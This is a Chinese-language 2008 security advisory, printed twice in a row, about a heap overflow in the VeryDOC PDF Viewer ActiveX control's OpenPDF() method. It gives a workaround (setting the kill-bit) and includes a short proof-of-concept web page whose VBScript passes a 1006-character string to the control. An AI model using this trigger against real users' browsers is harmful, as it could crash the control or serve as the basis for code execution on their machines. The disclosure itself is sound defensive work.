VeryDOC PDFView ActiveX组件堆溢出漏洞
发布日期:2008-11-15
更新日期:2008-11-18
受影响系统:
VeryDOC PDF Viewer ActiveX 2.0.0.1
描述:BUGTRAQ ID: 32313
VeryDOC的PDF Viewer ActiveX是一个PDF文件查看器组件。
PDFVIEW.PdfviewCtrl.1 ActiveX控件(pdfview.ocx)的OpenPDF()方式没有正确地验证用户输入参数,如果用户受骗访问了恶意网页并向该方式传送了超长字符串参数的话,就可以触发堆溢出,导致执行任意指令。
<*来源:r0ut3r (writ3r@gmail.com)
链接:http://secunia.com/advisories/32725/
*>
测试方法:<font color='#FF0000'><p align='center'>警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!</p></font><object classid=%26#39;clsid:433268D7-2CD4-43E6-AA24-2188672E7252%26#39; id=%26#39;target%26#39;></object>
<script language=%26#39;vbscript%26#39;>
Sub Boom
buff = String(1006, "A")
target.OpenPDF buff, 1, 1
End Sub
</script>
<input type=button onclick=Boom() value=%26#39;Boom?%26#39;>
建议:临时解决方法:
* 为CLSID 433268D7-2CD4-43E6-AA24-2188672E7252设置kill-bit。
厂商补丁:
VeryDOC
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.verydoc.com/pdf-viewer-ocx.html
发布日期:2008-11-15
更新日期:2008-11-18
受影响系统:
VeryDOC PDF Viewer ActiveX 2.0.0.1
描述:BUGTRAQ ID: 32313
VeryDOC的PDF Viewer ActiveX是一个PDF文件查看器组件。
PDFVIEW.PdfviewCtrl.1 ActiveX控件(pdfview.ocx)的OpenPDF()方式没有正确地验证用户输入参数,如果用户受骗访问了恶意网页并向该方式传送了超长字符串参数的话,就可以触发堆溢出,导致执行任意指令。
<*来源:r0ut3r (writ3r@gmail.com)
链接:http://secunia.com/advisories/32725/
*>
测试方法:<font color='#FF0000'><p align='center'>警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!</p></font><object classid=%26#39;clsid:433268D7-2CD4-43E6-AA24-2188672E7252%26#39; id=%26#39;target%26#39;></object>
<script language=%26#39;vbscript%26#39;>
Sub Boom
buff = String(1006, "A")
target.OpenPDF buff, 1, 1
End Sub
</script>
<input type=button onclick=Boom() value=%26#39;Boom?%26#39;>
建议:临时解决方法:
* 为CLSID 433268D7-2CD4-43E6-AA24-2188672E7252设置kill-bit。
厂商补丁:
VeryDOC
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.verydoc.com/pdf-viewer-ocx.html